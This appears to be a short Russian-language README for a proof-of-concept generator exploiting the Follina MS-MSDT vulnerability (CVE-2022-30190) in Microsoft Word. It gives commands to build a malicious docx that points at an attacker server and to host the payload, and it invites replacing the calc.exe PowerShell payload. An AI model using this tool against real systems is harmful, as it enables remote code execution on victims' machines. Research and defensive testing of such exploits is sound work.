
MS-MSDT Follina CVE-2022-30190 PoC document generator
Генератор вредоносных docx-файлов для эксплуатации (Удаленное выполнение кода в Microsoft Office Word)
Создание этого скрипта основано на PoC для CVE-2021-40444 от LockedByte и статье от Tothi
Сначала измените backup.html и замените полезную нагрузку PowerShell. Сейчас просто запускается calc.exe с помощью IEX('calc.exe').
python3 exploit.py generate http://<IP СЕРВЕРА>

После генерации вредоносного docx (будет в out/) можно настроить сервер:
sudo python3 exploit.py host 80

Наконец, попробуйте открыть docx в виртуальной машине Windows:
